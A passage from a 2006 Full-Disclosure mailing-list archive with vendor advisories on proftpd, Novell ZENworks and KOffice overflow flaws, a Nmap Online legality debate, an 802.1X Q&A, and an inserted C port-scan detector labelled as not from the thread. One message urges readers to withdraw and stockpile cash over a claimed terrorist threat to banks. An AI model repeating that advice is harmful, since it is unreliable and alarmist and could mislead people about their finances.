> Dude> On 01 Dec 2006 08:54:23 -0800, Randal L. Schwartz wrote:
> >>
> >> If there's caselaw in Georgia, that's useful for Georgia, but
> >> certainly isn't referencable in the 49 other states.
>
> Dude> actually, it is. it is called legal precedence
>
> It wasn't clear from your posting that you were talking about a federal case.

Well, try reading the material I reference before saying that anyone who listens to me is a fool next time, please.

> In that case, yes, it's caselaw. However, if it was just Georgia state law,
> that would *not* create case law for any other state.
>
> By the way, "caselaw" and "legal precedent" are the same.

Thanks for the info, I learned something new today, which makes it a good day.

From michael.holstein at csuohio.edu Fri Dec 1 17:58:51 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 01 Dec 2006 12:58:51 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <86zma7shm8.fsf@blue.stonehenge.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com>
Message-ID: <45706D5B.5070409@csuohio.edu>

> If it can be argued as an "unauthorized access", it's at least a misdemeanor
> in many states, felony in some. And you don't want to be on the wrong end of
> that prosecution.

"Illegal" and "Unlawful" are both fuzzy terms. Basically it's a matter of which side can convince 12 folks who have nothing better to do than drink stale coffee for $6/day.

From jmm at debian.org Fri Dec 1 18:11:17 2006
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Fri, 1 Dec 2006 19:11:17 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1222-2] New proftpd packages fix several vulnerabilities
Message-ID: <20061201181117.GA3274@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1222-2                   security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
December 1st, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : proftpd
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2006-5815 CVE-2006-6170 CVE-2006-6171
Debian Bug     : 399070

Due to technical problems yesterday's proftpd update lacked a build for the amd64 architecture, which is now available.

Several remote vulnerabilities have been discovered in the proftpd FTP daemon, which may lead to the execution of arbitrary code or denial of service. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2006-5815
    It was discovered that a buffer overflow in the sreplace() function may lead to denial of service and possibly the execution of arbitrary code.

CVE-2006-6170
    It was discovered that a buffer overflow in the mod_tls addon module may lead to the execution of arbitrary code.

CVE-2006-6171
    It was discovered that insufficient validation of FTP command buffer size limits may lead to denial of service. Due to unclear information this issue was already fixed in DSA-1218 as CVE-2006-5815.

For the stable distribution (sarge) these problems have been fixed in version 1.2.10-15sarge3.
For the unstable distribution (sid) this problem has been fixed in version 1.3.0-16 of the proftpd-dfsg package.

We recommend that you upgrade your proftpd package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From dave.j.moore at gmail.com Fri Dec 1 12:52:27 2006
From: dave.j.moore at gmail.com (Dave Moore)
Date: Fri, 1 Dec 2006 06:52:27 -0600
Subject: [Full-disclosure] Nmap Online
In-Reply-To:
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
Message-ID:

On 12/1/06, Mike Huber wrote:
> first of all, IANAL, but the TOS seem to cover the basics... However, I am
> unsure whether they would hold up under strict legal scrutiny. As far as I
> can tell, they may hold up under US criminal law, but not under civil law,
> as tort law has its own wonderful little eccentricities. The best safeguard
> they seem to have is that they must log the source IP of all scan
> requests... As far as I know, anyone who takes the time to read the nmap
> man page should be able to craft a scan which won't be detected by the
> scanned host (can someone be a definitive source on this point?), and anyone
> taking malicious action ought to be taking sufficient precautions to avoid
> detection anyway. None-the-less, my 8-ball sees litigation in their future.

All nmap scans are detectable. All port scans are detectable. Just depends on how hard you're looking.
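As an added example, not code from the thread or from Nmap, here is the kind of "looking" that makes a scan detectable on the target side: a small detector that reads constructed netfilter-style LOG lines and flags a source once it has touched a threshold number of distinct destination ports. The log format, addresses, ports and threshold are all assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Port-scan detector over netfilter-style LOG lines: per source address it
 * counts distinct destination ports; a source over the threshold is flagged.
 * A production detector would also age entries out with a sliding window. */

#define MAX_SRC 16
#define PORT_BITMAP_BYTES (65536 / 8)

struct src_stat {
    char addr[16];                           /* dotted-quad IPv4 source */
    unsigned char ports[PORT_BITMAP_BYTES];  /* one bit per DPT seen    */
    int distinct;                            /* number of bits set      */
};

/* Copies the value of "KEY=" (up to the next space) into out; 1 if found. */
static int field(const char *line, const char *key, char *out, size_t outlen) {
    const char *p = strstr(line, key);
    size_t n = 0;
    if (p == NULL) return 0;
    p += strlen(key);
    while (*p != '\0' && *p != ' ' && n + 1 < outlen) out[n++] = *p++;
    out[n] = '\0';
    return n > 0;
}

/* Finds or creates the per-source record; NULL when the table is full. */
static struct src_stat *lookup(struct src_stat *tab, int *n, const char *addr) {
    int i;
    for (i = 0; i < *n; i++)
        if (strcmp(tab[i].addr, addr) == 0) return &tab[i];
    if (*n >= MAX_SRC) return NULL;
    memset(&tab[*n], 0, sizeof tab[*n]);
    strncpy(tab[*n].addr, addr, sizeof tab[*n].addr - 1);
    return &tab[(*n)++];
}

/* Feeds one line. Returns the source's distinct-port count afterwards, or
 * -1 if the line carries no usable SRC=/DPT= pair. */
int observe(struct src_stat *tab, int *n, const char *line) {
    char src[16], dpt[8];
    long port;
    unsigned char bit;
    struct src_stat *s;
    if (!field(line, "SRC=", src, sizeof src) ||
        !field(line, "DPT=", dpt, sizeof dpt)) return -1;
    port = strtol(dpt, NULL, 10);
    if (port < 0 || port > 65535) return -1;
    if ((s = lookup(tab, n, src)) == NULL) return -1;
    bit = (unsigned char)(1u << (port & 7));
    if (!(s->ports[port >> 3] & bit)) {      /* first contact with this port */
        s->ports[port >> 3] |= bit;
        s->distinct++;
    }
    return s->distinct;
}

/* Runs the detector over a batch of lines and returns how many sources hit
 * at least `threshold` distinct ports; the first such address is copied to
 * `flagged` when it is non-NULL. */
int count_scanners(const char *const *lines, int nlines, int threshold,
                   char *flagged, size_t flagged_len) {
    static struct src_stat tab[MAX_SRC];     /* static: ~128 KiB, keep off the stack */
    int n = 0, i, hits = 0;
    for (i = 0; i < nlines; i++) observe(tab, &n, lines[i]);
    for (i = 0; i < n; i++) {
        if (tab[i].distinct < threshold) continue;
        if (hits == 0 && flagged != NULL && flagged_len > 0) {
            strncpy(flagged, tab[i].addr, flagged_len - 1);
            flagged[flagged_len - 1] = '\0';
        }
        hits++;
    }
    return hits;
}

/* Constructed sample lines in netfilter LOG style (not captured traffic). */
static const char *const sample[] = {
    "kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=21 SYN",
    "kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=22 SYN",
    "kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.0.2.10 PROTO=TCP SPT=40003 DPT=23 SYN",
    "kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.0.2.10 PROTO=TCP SPT=40004 DPT=25 SYN",
    "kernel: IN=eth0 OUT= SRC=10.0.0.5 DST=192.0.2.10 PROTO=TCP SPT=40005 DPT=80 SYN",
    "kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=192.0.2.10 PROTO=TCP SPT=51000 DPT=80 SYN",
    "kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=192.0.2.10 PROTO=TCP SPT=51001 DPT=80 SYN",
    "kernel: martian source 203.0.113.7 from 10.0.0.1, on dev eth0",
};
#define NSAMPLE ((int)(sizeof sample / sizeof sample[0]))

int main(void) {
    char who[16];
    int hits = count_scanners(sample, NSAMPLE, 5, who, sizeof who);
    printf("%d source(s) flagged; first: %s\n", hits, hits ? who : "-");
    return 0;
}
```

With the sample above, 10.0.0.5 is flagged at threshold 5 while 10.0.0.9, which only hits port 80 repeatedly, is not; a slow scan that spreads over a long time would need the sliding-window refinement noted in the comments.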
From thegesus at gmail.com Fri Dec 1 15:27:47 2006
From: thegesus at gmail.com (TheGesus)
Date: Fri, 1 Dec 2006 10:27:47 -0500
Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack
In-Reply-To: <200612011515526141632399@mail.smumn.edu>
References: <200612011515526141632399@mail.smumn.edu>
Message-ID: <5e70f6530612010727h6b3af594t6a75fa731f07500a@mail.gmail.com>

On 12/1/06, SDALAN04 at smumn.edu wrote:
> I beg to differ Mike, they are trying to play the same lame ass game that the (Bush) Oil industry, trying to raise interest rates because Osama Bin Laden is going to hack everyone's account.
>
> Not so smart, I guess I better withdraw all my money American and buy Euros to be safe?
>
>
> On Friday, December 01, 2006 9:04 AM, Michael Holstein wrote:
> >> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible.
> >
> >Date: Fri, 01 Dec 2006 10:04:39 -0500
> >From: Michael Holstein
> >To:
> >Subject: Re: [Full-disclosure] Financial firms warned of Qaeda cyber attack
> >
> >and since when is DHS "credible" itself? and why do people scatter every
> >time their terrorism "mood ring" changes color?
> >
> >I guess they don't realize that servers overheat when wrapped with
> >plastic and duct tape.
> >
> >~Mike.
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
>
>
> "Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein
>
> "So much stupidity in so little brain!"
>

If you ever plan to get money out of the bank, you better do it now, while the getting is good.

In a bank run, the federal government (guardian angel and loyal slave of the banks) would most certainly declare a moratorium on withdrawals.

More and more people are hearing the recommendation to "withdraw a little extra cash out of the banks" to prepare for cyber attacks.

If as many as 1.32% of bank depositors take their advice and withdraw all their money, the banks will close their doors.

Al Qaeda threatens to disrupt the electronic bank payments system. This system contributes about 90% of the US money supply. Without it, 10% of the money supply (the cash & coin) must take over the work of the other 90%.

Conclusion: Withdraw and stockpile some cash now. Shoot for at least three months' cash requirements. Don't wait. Start now.

==================

-- 
Paul Milne
If you live within five miles of a 7-11, you're toast.

(thanks, Paul, wherever you are!)

From ozan at cryptos.net Fri Dec 1 19:37:31 2006
From: ozan at cryptos.net (Ozan Ozkara)
Date: Fri, 01 Dec 2006 21:37:31 +0200
Subject: [Full-disclosure] 802.1X tool?
Message-ID: <1165001851.5566.25.camel@prophecy>

Hi folks,

I am trying to find a tool which provides automatic client configuration for an 802.1X implementation in a Windows environment. I'm trying to implement 802.1x authentication for both wired and wireless connections. Is there any way to do a remote client configuration tool for the win32 environment? Will I be able to do that?

I'd appreciate any real world experience on the subject.

thanks

-- 
Ozan Ozkara

From michael.holstein at csuohio.edu Fri Dec 1 20:16:09 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 01 Dec 2006 15:16:09 -0500
Subject: [Full-disclosure] 802.1X tool?
In-Reply-To: <1165001851.5566.25.camel@prophecy>
References: <1165001851.5566.25.camel@prophecy>
Message-ID: <45708D89.2030407@csuohio.edu>

Meetinghouse (AEGIS) or Funk (Odyssey).

Note : Meetinghouse is now owned by Cisco.

Cheers,

~Mike.

Ozan Ozkara wrote:
> Hi folks,
>
> I am trying to find a tool which provides automatic client configuration
> for 802.1X implementation in windows environment. I'm trying to
> implement 802.1x authentication for
> both wired and wireless connection. Is there any way to do remote client
> configuration tool for win32 environment. Will i be able to do that?
>
> I'd appreciate any real world experience on the subject.
>
> thanks
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From michael.holstein at csuohio.edu Fri Dec 1 20:30:36 2006
From: michael.holstein at csuohio.edu (Michael Holstein)
Date: Fri, 01 Dec 2006 15:30:36 -0500
Subject: [Full-disclosure] 802.1X tool?
In-Reply-To: <1165001851.5566.25.camel@prophecy>
References: <1165001851.5566.25.camel@prophecy>
Message-ID: <457090EC.2020804@csuohio.edu>

Okay .. wait, maybe I didn't understand your question.

Windows XP (post sp1) can natively do 802.1x on both wired and wireless connections. Windows 2000 can do it if you get this :
http://support.microsoft.com/kb/313664

You can push the 802.1x details out via GPO.
http://technet2.microsoft.com/WindowsServer/en/Library/5506eeef-9e91-4cab-8e1e-3efb504d1b471033.mspx

The wired instructions are similar.

If you're not in a domain model (ie: you're talking about a college resnet, etc) you're out of luck on the GPOs, but you can do it other ways (package your own script, .reg file, etc .. but telling people to click "ok" on a .reg file is a *bad* thing to do...

It gets a bit trickier if you're using client-side certs, more so if you're not using a Microsoft CA to issue them, but certainly not impossible (eg: you've got to import the root and client certs manually, not to mention getting OpenSSL/whatever to cough up ones that MS understands) ...

Cheers,

Michael Holstein CISSP GCIA
Cleveland State University

From labs-no-reply at idefense.com Fri Dec 1 21:01:18 2006
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 01 Dec 2006 16:01:18 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.01.06: Novell ZENworks Asset Management Collection Client Heap Overflow Vulnerability
Message-ID: <4570981E.3020801@idefense.com>

Novell ZENworks Asset Management Collection Client Heap Overflow Vulnerability

iDefense Security Advisory 12.01.06
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 01, 2006

I. BACKGROUND

Novell Inc's ZENworks is a set of tools used to automate IT management and business processes across the various computing resources within an organization. The Collection Client provides functionality, as a service, that will supply the Collection Server with information regarding the managed machine's hardware and software configuration.
For more information, visit http://www.novell.com/products/zenworks/ II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Novell Inc.'s ZENworks Asset Management could potentially allow an attacker to execute arbitrary code with SYSTEM privileges on Windows or root on the various supported UNIX based operating systems. A heap overflow may occur when processing specially crafted packets sent to the Collection Client daemon. The root cause of this vulnerability is identical to that of the vulnerability in Msg.dll. For more information please consult the Msg.dll advisory. III. ANALYSIS Successful exploitation of this vulnerability could allow a remote attacker to take complete control of the affected system. While researching this vulnerability, iDefense Labs found that the Task Server and Collection Server components were also affected. It seems that the Collection Client is statically linked with the Msg.dll library. IV. DETECTION iDefense has confirmed the existence of this vulnerability in version 7.0.0.36 of the CClient.exe and Msg.dll files included with Novell Inc's ZENworks Asset Management 7.0 SP1. Older versions are suspected to be vulnerable as well. V. WORKAROUND iDefense is unaware of an effective workarounds for this issue. VI. VENDOR RESPONSE Novell's ZENworks team has addressed this vulnerability within ZENworks 7 Asset Management SP1 IR11. More information can be found by visiting http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974824.htm . VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/16/2006 Initial vendor notification 10/19/2006 Initial vendor response 12/01/2006 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Eric Detoisien. 
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From labs-no-reply at idefense.com Fri Dec 1 21:01:27 2006
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 01 Dec 2006 16:01:27 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.01.06: Novell ZENworks Asset Management Msg.dll Heap Overflow Vulnerability
Message-ID: <45709827.7010400@idefense.com>

Novell ZENworks Asset Management Msg.dll Heap Overflow Vulnerability

iDefense Security Advisory 12.01.06
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 01, 2006

I. BACKGROUND

Novell Inc.'s ZENworks is a set of tools used to automate IT management and business processes across the various computing resources within an organization. The Task Server and Collection Server daemons provide functionality to manage a distributed network of machines. These daemons will typically only be running on the machine that is being used to manage assets. For more information see http://www.novell.com/products/zenworks/

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Novell Inc.'s ZENworks Asset Management could potentially allow an attacker to execute arbitrary code with the privileges of the administrator.

A heap overflow may occur when processing specially crafted packets sent to the Task Server or Collection Server daemons. This problem specifically exists due to an integer overflow when allocating memory for remotely supplied data.

III. ANALYSIS

Successful exploitation of this vulnerability could allow a remote attacker to take complete control of the affected system.

While researching this vulnerability, iDefense Labs found that the Task Server and Collection Server components were both affected. Additionally, the Collection Client is statically linked with this library. Information on the vulnerability as it relates to the Collection Client can be found in a separate advisory.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in version 7.0.0.36 of the CClient.exe and Msg.dll files included with Novell Inc.'s ZENworks Asset Management 7.0 SP1. Older versions are suspected to be vulnerable as well.

V. WORKAROUND

iDefense is unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

Novell's ZENworks team has addressed this vulnerability within ZENworks 7 Asset Management SP1 IR11. More information can be found by visiting http://support.novell.com/cgi-bin/search/searchtid.cgi?/2974824.htm .

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

10/16/2006  Initial vendor notification
10/19/2006  Initial vendor response
12/01/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Eric Detoisien.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From security at mandriva.com Fri Dec 1 21:16:01 2006
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 1 Dec 2006 14:16:01 -0700
Subject: [Full-disclosure] [ MDKSA-2006:222 ] - Updated koffice packages fixes integer overflow vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:222
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : koffice
 Date    : December 1, 2006
 Affected: 2007.0
_______________________________________________________________________

 Problem Description:

 An integer overflow was discovered in KOffice's filtering code. By tricking a user into opening a specially crafted PPT file, attackers could crash KOffice or possibly execute arbitrary code with the user's privileges.

 The updated packages have been patched to correct this issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6120
_______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2007.0:
 97ad85cf8411c6ff5de87a62aab94a35  2007.0/i586/koffice-1.5.91-3.2mdv2007.0.i586.rpm
 db50d5559832bbb2dbb2c411184d134f  2007.0/i586/koffice-karbon-1.5.91-3.2mdv2007.0.i586.rpm
 7c748642ea280486ccc9ad1164924ec6  2007.0/i586/koffice-kexi-1.5.91-3.2mdv2007.0.i586.rpm
 6c5a63dc9354f8b1215adc7512c08685  2007.0/i586/koffice-kformula-1.5.91-3.2mdv2007.0.i586.rpm
 78f0e4824c86b6c3f43c4d1e9a5b792a  2007.0/i586/koffice-kivio-1.5.91-3.2mdv2007.0.i586.rpm
 8c9a702ef82928900043eef81702df35  2007.0/i586/koffice-koshell-1.5.91-3.2mdv2007.0.i586.rpm
 20556ba10c0a5e67da7577077df62312  2007.0/i586/koffice-kplato-1.5.91-3.2mdv2007.0.i586.rpm
 b3319fcc35d5a7d370698196ec75ff92  2007.0/i586/koffice-kpresenter-1.5.91-3.2mdv2007.0.i586.rpm
 be36984a365fc1e4fbc7b28b931b1bf3  2007.0/i586/koffice-krita-1.5.91-3.2mdv2007.0.i586.rpm
 5af60bc6e42cd6489ad018dba76b06a2  2007.0/i586/koffice-kspread-1.5.91-3.2mdv2007.0.i586.rpm
 24d4813bee6f2b5814972554d1e6d5ca  2007.0/i586/koffice-kugar-1.5.91-3.2mdv2007.0.i586.rpm
 6fae99addb4c1093aa04de1c0e59c97e  2007.0/i586/koffice-kword-1.5.91-3.2mdv2007.0.i586.rpm
 7ae26f275efedce5d44d79f392f0bb58  2007.0/i586/koffice-progs-1.5.91-3.2mdv2007.0.i586.rpm
 3483943311cd9d80368fe3d08f58c371  2007.0/i586/libkoffice2-karbon-1.5.91-3.2mdv2007.0.i586.rpm
 597101df425c25e7dd98c9fe9bf17e07  2007.0/i586/libkoffice2-karbon-devel-1.5.91-3.2mdv2007.0.i586.rpm
 57e233c194e554e8704d4c32b788a76c  2007.0/i586/libkoffice2-kexi-1.5.91-3.2mdv2007.0.i586.rpm
 2c4c98f62b419e63c0ef65979321deda  2007.0/i586/libkoffice2-kexi-devel-1.5.91-3.2mdv2007.0.i586.rpm
 a71985bc483afedf378415adce427a06  2007.0/i586/libkoffice2-kformula-1.5.91-3.2mdv2007.0.i586.rpm
 994e26bb97eac10fdd2e09cca64b87a9  2007.0/i586/libkoffice2-kformula-devel-1.5.91-3.2mdv2007.0.i586.rpm
 4c41e347712800078a820306a98a26c8  2007.0/i586/libkoffice2-kivio-1.5.91-3.2mdv2007.0.i586.rpm
 000ae5e267e281e764b95dccb9c4b84e  2007.0/i586/libkoffice2-kivio-devel-1.5.91-3.2mdv2007.0.i586.rpm
 f23734cbd98541eecdeb258c0732fc1a  2007.0/i586/libkoffice2-koshell-1.5.91-3.2mdv2007.0.i586.rpm
 dc638d9155717c2c4091b9da2e55144c  2007.0/i586/libkoffice2-kplato-1.5.91-3.2mdv2007.0.i586.rpm
 f6d05ae189da6de29cc0c69afab5027b  2007.0/i586/libkoffice2-kpresenter-1.5.91-3.2mdv2007.0.i586.rpm
 87d31c59a56729a2f4e9bddc36ea8c32  2007.0/i586/libkoffice2-kpresenter-devel-1.5.91-3.2mdv2007.0.i586.rpm
 2fd250793b43f2bb2255d97859f886d2  2007.0/i586/libkoffice2-krita-1.5.91-3.2mdv2007.0.i586.rpm
 6c383e3918558aded1e61ddfdadb7273  2007.0/i586/libkoffice2-krita-devel-1.5.91-3.2mdv2007.0.i586.rpm
 51ed465cb0c6ee89975aec7f1262ab66  2007.0/i586/libkoffice2-kspread-1.5.91-3.2mdv2007.0.i586.rpm
 0663f72f3a1bdce3672899a469d6972b  2007.0/i586/libkoffice2-kspread-devel-1.5.91-3.2mdv2007.0.i586.rpm
 04dce49f0d17bdd14716d53ea8e1da0f  2007.0/i586/libkoffice2-kugar-1.5.91-3.2mdv2007.0.i586.rpm
 70816b062ed237a79478e3c248922cdd  2007.0/i586/libkoffice2-kugar-devel-1.5.91-3.2mdv2007.0.i586.rpm
 a8e1d9c67a02b6910defc0e09b4716f7  2007.0/i586/libkoffice2-kword-1.5.91-3.2mdv2007.0.i586.rpm
 dd88904044b5103407fda7c1a2e53fde  2007.0/i586/libkoffice2-kword-devel-1.5.91-3.2mdv2007.0.i586.rpm
 8619b90e23e355b545230c6a9fbf5cd2  2007.0/i586/libkoffice2-progs-1.5.91-3.2mdv2007.0.i586.rpm
 8c4e1ccdfe2b69d66739aa04c09b4eae  2007.0/i586/libkoffice2-progs-devel-1.5.91-3.2mdv2007.0.i586.rpm
 18f79118122cdc73e54dfec4d9365091  2007.0/SRPMS/koffice-1.5.91-3.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 0d4734623788de46f16fb9866362fb60  2007.0/x86_64/koffice-1.5.91-3.2mdv2007.0.x86_64.rpm
 6e9294e503e496542c867c9f62298731  2007.0/x86_64/koffice-karbon-1.5.91-3.2mdv2007.0.x86_64.rpm
 65907aa84ed619962aa87599ea5c922c  2007.0/x86_64/koffice-kexi-1.5.91-3.2mdv2007.0.x86_64.rpm
 db489203dc559d631df6cfc7fafe93cd  2007.0/x86_64/koffice-kformula-1.5.91-3.2mdv2007.0.x86_64.rpm
 1500fb9ee551eaee484254cb2424e57a  2007.0/x86_64/koffice-kivio-1.5.91-3.2mdv2007.0.x86_64.rpm
 9555a5d61aa1132196ab53474d86e3b5  2007.0/x86_64/koffice-koshell-1.5.91-3.2mdv2007.0.x86_64.rpm
 b2315a4e783d8482d56ee0723e5a9b0e  2007.0/x86_64/koffice-kplato-1.5.91-3.2mdv2007.0.x86_64.rpm
 c742e5bbef3f868d538cfd65ee581623  2007.0/x86_64/koffice-kpresenter-1.5.91-3.2mdv2007.0.x86_64.rpm
 9bb89a8140594af37cb5533039f8b8b1  2007.0/x86_64/koffice-krita-1.5.91-3.2mdv2007.0.x86_64.rpm
 20702a2f45aa65bf5fd71034c379d877  2007.0/x86_64/koffice-kspread-1.5.91-3.2mdv2007.0.x86_64.rpm
 ba4d9249380cb17d86f1cc20b15a6da0  2007.0/x86_64/koffice-kugar-1.5.91-3.2mdv2007.0.x86_64.rpm
 96a772d36130780a92a0d14a51b82173  2007.0/x86_64/koffice-kword-1.5.91-3.2mdv2007.0.x86_64.rpm
 3ef642a955a0de9f4440a9b7f5ed112d  2007.0/x86_64/koffice-progs-1.5.91-3.2mdv2007.0.x86_64.rpm
 90aefb67aefcc6c70e3f0acafdf2d20a  2007.0/x86_64/lib64koffice2-karbon-1.5.91-3.2mdv2007.0.x86_64.rpm
 d99922c80f817fe39778f6711cc48a24  2007.0/x86_64/lib64koffice2-karbon-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 d1ce54c1da5baf6e5d78f6dbb9df2e88  2007.0/x86_64/lib64koffice2-kexi-1.5.91-3.2mdv2007.0.x86_64.rpm
 5b5ab70a073c52d1866f8f0504d696d8  2007.0/x86_64/lib64koffice2-kexi-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 b27623062be6e6c56afab8d64215eda4  2007.0/x86_64/lib64koffice2-kformula-1.5.91-3.2mdv2007.0.x86_64.rpm
 c9d45dfb4c71793c6a04772da52a4c27  2007.0/x86_64/lib64koffice2-kformula-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 c541021dfc624c5b01a2994d3e62354b  2007.0/x86_64/lib64koffice2-kivio-1.5.91-3.2mdv2007.0.x86_64.rpm
 78fbf699ce7bd245f7ffcce694488bd8  2007.0/x86_64/lib64koffice2-kivio-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 bc14a92c9079f26509110d8dcfef4234  2007.0/x86_64/lib64koffice2-koshell-1.5.91-3.2mdv2007.0.x86_64.rpm
 04df83ce95051488ba0165e02a647438  2007.0/x86_64/lib64koffice2-kplato-1.5.91-3.2mdv2007.0.x86_64.rpm
 8bcc5137ccf41bba147986de8d8b95e4  2007.0/x86_64/lib64koffice2-kpresenter-1.5.91-3.2mdv2007.0.x86_64.rpm
 9157afe6ed8b9f4745cd7f0333ac484f  2007.0/x86_64/lib64koffice2-kpresenter-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 9edddd073414539f674939a95412ea9e  2007.0/x86_64/lib64koffice2-krita-1.5.91-3.2mdv2007.0.x86_64.rpm
 4e54205509fe323caaaecab61acb2e20  2007.0/x86_64/lib64koffice2-krita-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 8149704298a9bfe1edcd903b73536654  2007.0/x86_64/lib64koffice2-kspread-1.5.91-3.2mdv2007.0.x86_64.rpm
 ed82f407c7be218dba128252b4de09f3  2007.0/x86_64/lib64koffice2-kspread-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 62a023ac8bb89806a0080797f6f9a03f  2007.0/x86_64/lib64koffice2-kugar-1.5.91-3.2mdv2007.0.x86_64.rpm
 0479922c3466a2f4ba2c5079d55fe634  2007.0/x86_64/lib64koffice2-kugar-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 7039997ba59f0e670e8f1352c0c82711  2007.0/x86_64/lib64koffice2-kword-1.5.91-3.2mdv2007.0.x86_64.rpm
 aed8cd41144d076f9ee51b6cd0966a51  2007.0/x86_64/lib64koffice2-kword-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 aacf502f62097c102dc44be1387763d7  2007.0/x86_64/lib64koffice2-progs-1.5.91-3.2mdv2007.0.x86_64.rpm
 d30e35e35d4e4832f78a61e116114a33  2007.0/x86_64/lib64koffice2-progs-devel-1.5.91-3.2mdv2007.0.x86_64.rpm
 18f79118122cdc73e54dfec4d9365091  2007.0/SRPMS/koffice-1.5.91-3.2mdv2007.0.src.rpm
_______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security.
 You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

